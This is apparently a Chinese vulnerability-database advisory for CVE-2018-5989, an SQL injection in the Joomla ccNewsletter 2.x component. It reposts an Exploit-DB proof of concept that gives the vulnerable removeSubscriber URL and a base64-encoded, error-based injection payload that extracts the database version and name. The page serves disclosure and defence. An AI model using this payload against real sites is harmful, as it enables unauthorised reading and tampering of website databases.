Joomla! ccNewsletter组件安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1124806 漏洞类型 SQL注入
发布时间 2018-02-16 更新时间 2019-09-30
CVE编号 CVE-2018-5989 CNNVD-ID CNNVD-201802-863
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/44132
https://cxsecurity.com/issue/WLB-2018020204
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201802-863
|漏洞详情
Joomla!是美国Open Source Matters团队开发的一套开源的内容管理系统(CMS),该系统提供RSS馈送、网站搜索等功能。ccNewsletter是使用在其中的一个电子简报管理组件。 Joomla! ccNewsletter 2.x版本中存在SQL注入漏洞。远程攻击者可借助‘id’参数利用该漏洞查看、添加、更改或删除后端数据库的信息。
|漏洞EXP
# # # #
# Exploit Title: Joomla Component ccNewsletter 2.x.x 'id' - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: https://www.chillcreations.com/
# Software Link: https://extensions.joomla.org/extension/ccnewsletter/
# Version: 2.x Stable
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5989
# # # #
# Exploit Author: Ihsan Sencan
# # # #
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_ccnewsletter&task=removeSubscriber&id=[SQL]
#  
# Y2ZjZDIwODQ5NWQ1NjVlZjY2ZTdkZmY5Zjk4NzY0ZGEnJTIwT1IlMjAoU0VMRUNUJTIwMiUyMEZST00oU0VMRUNUJTIwQ09VTlQoKiksQ09OQ0FUKHZlcnNpb24oKSwoU0VMRUNUJTIwKEVMVCgxPTEsMSkpKSxkYXRhYmFzZSgpLEZMT09SKFJBTkQoMCkqMikpeCUyMEZST00lMjBJTkZPUk1BVElPTl9TQ0hFTUEuUExVR0lOUyUyMEdST1VQJTIwQlklMjB4KWEpLS0lMjBhTXBM
# 
# # # #
|参考资料

来源:EXPLOIT-DB
链接:https://exploit-db.com/exploits/44132